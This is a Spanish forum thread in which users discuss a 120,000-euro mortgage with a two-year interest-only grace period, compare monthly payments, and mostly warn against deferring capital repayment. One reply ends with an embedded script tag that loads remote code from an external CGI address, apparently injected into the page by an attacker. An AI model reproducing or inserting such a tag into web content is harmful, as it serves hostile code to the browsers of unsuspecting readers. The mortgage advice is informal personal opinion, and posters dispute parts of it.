¿Qué os parece una hipoteca con 2 años de carencia?

fuentesss

Madmaxista
Desde
6 Abr 2007
Mensajes
1.180
Reputación
5
Lugar
En el Gimnasio...
Hola

Hace unos días una amiga fué a la Caixa y le comentaron lo de la hipoteca con carencia de dos años. La verdad que había escuchado algo de carencias, pero no lo había respaldado con números. La cosa quedaría así...

120.000 euros al 6% a 30 anys y 2 años carencia = 600 euros/mes.
120.000 euros al 6% a 30 anys = 720 euros/mes.

Pagando 720 euros/mes y cobrando casi el doble, ¿Veriais bien pedir dos años de carencia y así aún poder ahorrar más y poder ir amortizando? ¿Tiene algo de malo hacerlo así para el resto de la hipoteca? Muchas gracias.

Adéu.
 

nemo4

Madmaxista
Desde
22 May 2006
Mensajes
12.136
Reputación
4.949
Creo que es al reves 720 € para la con carencia.... en todo caso al final del prestamo habrás pagado la misma cantidad.
 

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
Con la carencia no amortizas un elemento, si la idea es hacer una amortización parcial, pues es lo mismo, pero si te esperas esos dos años y depsues no amortizas lo q tienes q amortizar, pagas esos 2 años de gratis al banco
 

fuentesss

Madmaxista
Desde
6 Abr 2007
Mensajes
1.180
Reputación
5
Lugar
En el Gimnasio...
nemo4 dijo:
Creo que es al reves 720 € para la con carencia.... en todo caso al final del prestamo habrás pagado la misma cantidad.
Hola

Mi amiga me lo explicó así. 120.000 euros al 6% a 30 anys y 2 años carencia = 600 euros/mes.

Al pagar sólo intereses pagas menos, es lo que me comentó mi amiga, que es lo que le dijeron en el banco. Dos años después, pagas la cuota normal que pagarías desde el primero día, eso sí al interés que esté, que yo lo he contado al 6%.

Más que nada lo hago para ver como me irá para pagar, ya que si puedo también lo alquilaré y si no puedo pues ir ahorrando e ir amortizando todo lo que pueda de hipoteca en el menor tiempo posible.

Adéu.
 

fuentesss

Madmaxista
Desde
6 Abr 2007
Mensajes
1.180
Reputación
5
Lugar
En el Gimnasio...
SUPREME dijo:
Con la carencia no amortizas un elemento, si la idea es hacer una amortización parcial, pues es lo mismo, pero si te esperas esos dos años y depsues no amortizas lo q tienes q amortizar, pagas esos 2 años de gratis al banco
Ya... Es lo que me han comentado también, pero yo no sé como me irá para pagar al principio, supongo que bien, pero si no almenos me sale la cuota más barata... jejeje.
 

Calculín

Madmaxista
Desde
23 Oct 2006
Mensajes
12.016
Reputación
15.261
Mírate este hilo que seguro que te ayuda: http://www.burbuja.info/inmobiliaria/showthread.php?t=29535

Y yo de ti además de las cuentas del banco haría también algunos cálculos con el euribor más alto, porque cuando termine la carencia, si se suma la amortización de capital más una revisión importante la cuota puede subir mucho de golpe.

Saludos
 

SUPREME

Madmaxista
Desde
1 Oct 2006
Mensajes
1.568
Reputación
86
fuentesss dijo:
Ya... Es lo que me han comentado también, pero yo no sé como me irá para pagar al principio, supongo que bien, pero si no almenos me sale la cuota más barata... jejeje.
Pero el tema es que para estar pagando sólo intereses vete de alquiler, ya que tienes q pagar los papeles, q son un pico, más además derramas, impuestos bla bla bla...

Como recomendación, pagar casi el máximo que se pueda, ya que bjaando el capital que se adeuda, las subidas de cuota en el caso de subida del tipo de interés (el pan de cada día) son menores.

Yo no recomendaría la carencia a menos que esté uno en las últimas y no pueda pagar (en este caso recomendaría vender). Si empezamos así...
 

Calculín

Madmaxista
Desde
23 Oct 2006
Mensajes
12.016
Reputación
15.261
fuentesss dijo:
120.000 euros al 6% a 30 anys y 2 años carencia = 600 euros/mes.
120.000 euros al 6% a 30 anys = 720 euros/mes.
¡Otra cosa, para que salgan esas cuotas he tenido que meterle al simulador un 1.75 de diferencial! http://hipotecas.sagaz.es/index.php?capital=120000&mensualidad_alquiler=&annos=30&TAE_rendimiento_ahorro_alquiler=&carencia=0&euribor=4.25&diferencial=1.75&ipc=2.5&calculo=Calcular ¿Seguro que están bien? Porque si es así es bastante alto...

Saludos!
 

Marai

Madmaxista
Desde
31 Jul 2006
Mensajes
8.032
Reputación
6.796
fuentesss dijo:
Hola

Hace unos días una amiga fué a la Caixa y le comentaron lo de la hipoteca con carencia de dos años. La verdad que había escuchado algo de carencias, pero no lo había respaldado con números. La cosa quedaría así...

120.000 euros al 6% a 30 anys y 2 años carencia = 600 euros/mes.
120.000 euros al 6% a 30 anys = 720 euros/mes.

Pagando 720 euros/mes y cobrando casi el doble, ¿Veriais bien pedir dos años de carencia y así aún poder ahorrar más y poder ir amortizando? ¿Tiene algo de malo hacerlo así para el resto de la hipoteca? Muchas gracias.

Adéu.
Lo malo de los años de carencia es cuando llega el momento de pagar lo que tienes que pagar realmente a no sabes que tipo de interés aplicable dentro de dos años. No creo que en esos dos años, con casa nueva den para muchos ahorros con los gastos para amueblar la casa, la comunidad, agua, electricidad, teléfono etc. Tienes que calcular el % de sueldo que te llevará la hipoteca cuando te quiten la carencia. Si el sueldo es de 1200 euros me parece muy apurado.
 

Renzo

Madmaxista
Desde
25 Sep 2006
Mensajes
1.479
Reputación
1.162
Hola.

Carencia significa que solo paga intereses, no amortiza nada. Es exactamente igual que si alquilara, lo que suelen decir "tirar el dinero". Despues de esos dos años deberá los mismos 120.000€ como si hubiera comprado entonces.

Así que la pregunta es ¿Para que hacer carencia?.

La única razón que se me ocurre es, como emergencia, por no poder pagar la cuota entera. Una vez te metes en el "juego" de comprar una vivienda, el objetivo es amortizar lo máximo posible lo antes posible, ya que cada euro amortizado son dos euros ahorrados.

Si tu amiga es capaz de pagar la cuota total ¿para que se coge una carencia?
Si no es capaz de pagar la cuota y por eso coge carencia ¿Que hará dentro de dos años cuando le actualicen a la cuota total?

Excepto en casos concretos y con motivos especiales, yo no recomendaría nunca un periodo de carencia, es como comprarte un Ferrari solo porque empiezas a pagarlo realmente dentro de dos años. Si no puedes pagarlo, no puedes. El resto son triquiñuelas.

Los casos más dramáticos que se dan en Estados Unidos en el tema de impagos es por las hipotecas "solo intereses" que vendrían a ser como las carencias. Todo lo que no pagas al principio lo acabarás pagando.

Igual para las hipotecas con tres primeros meses Euribor menos X o con chorradas iniciales que son reclamos que a la larga no suponen ninguna ventaja (al cabo de 30 años).

Osea, si va a comprar dile que amortice, que ahorre... pero pedir carencia para ir ahorrando para amortizar es absurdo, es como pedir un préstamo a un banco para poder pagar al banco el prestamo que has pedido. No pagar la parte de amortización al banco para ahorrartela y pagarla despues de dos años... si no te la has gastado en otra cosa. Además cuanto antes se amortiza antes se actualizan a la baja los intereses a seguir pagando.

Es mi opinión.
 

Mi_casa_es_tu_casa

Madmaxista
Desde
19 Jul 2006
Mensajes
5.475
Reputación
58
Lugar
BCN
Carencia: Pan para hoy y hambre para mañana<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

exburbujista

Madmaxista
Desde
19 Abr 2007
Mensajes
18
Reputación
0
Renzo dijo:
Hola.

Carencia significa que solo paga intereses, no amortiza nada. Es exactamente igual que si alquilara, lo que suelen decir "tirar el dinero". Despues de esos dos años deberá los mismos 120.000€ como si hubiera comprado entonces.
.
NO ES CIERTO, seguramente si paga un 6% son intereses fijos, de alquiler cada año le subirían el ipc. Si compra siempre pagaría lo mismo pero dentro de x años su salario habrá subido. además tiene las desgravaciones.

hay que hacer numeros pero en muchos casos yo pediría de solo intereses para siempre,

ya se ha discutido muchas veces, si compras aunque solo pagues los intereses el dinero se va deteriorando aunque sea poco y además siempre pagarías lo mismo, mientras que de alquiler ocurre lo contrario, cada año te lo suben.
 

Marai

Madmaxista
Desde
31 Jul 2006
Mensajes
8.032
Reputación
6.796
exburbujista dijo:
NO ES CIERTO, seguramente si paga un 6% son intereses fijos, de alquiler cada año le subirían el ipc. Si compra siempre pagaría lo mismo pero dentro de x años su salario habrá subido. además tiene las desgravaciones.

hay que hacer numeros pero en muchos casos yo pediría de solo intereses para siempre,

ya se ha discutido muchas veces, si compras aunque solo pagues los intereses el dinero se va deteriorando aunque sea poco y además siempre pagarías lo mismo, mientras que de alquiler ocurre lo contrario, cada año te lo suben.
Exburbu, esta respuesta demuestra que después del hackeo al que has sido sometido por algún inane sigues teniendo tan pocas luces como siempre.
 

pepito

Madmaxista
Desde
29 Mar 2007
Mensajes
163
Reputación
0
fuentesss dijo:
Hola

Hace unos días una amiga fué a la Caixa y le comentaron lo de la hipoteca con carencia de dos años. La verdad que había escuchado algo de carencias, pero no lo había respaldado con números. La cosa quedaría así...

120.000 euros al 6% a 30 anys y 2 años carencia = 600 euros/mes.
120.000 euros al 6% a 30 anys = 720 euros/mes.

Pagando 720 euros/mes y cobrando casi el doble, ¿Veriais bien pedir dos años de carencia y así aún poder ahorrar más y poder ir amortizando? ¿Tiene algo de malo hacerlo así para el resto de la hipoteca? Muchas gracias.

Adéu.
Yo sólo cogería una carencia sino me quedase más remedio ... la carencia es pan para hoy ....
 

exburbujista

Madmaxista
Desde
19 Abr 2007
Mensajes
18
Reputación
0
Marai dijo:
Exburbu, esta respuesta demuestra que después del hackeo al que has sido sometido por algún inane sigues teniendo tan pocas luces como siempre.
en lo que estamos de acuerdo es en lo del inane.
espero que algun dia nos ilumines con tus brillantes locuciones.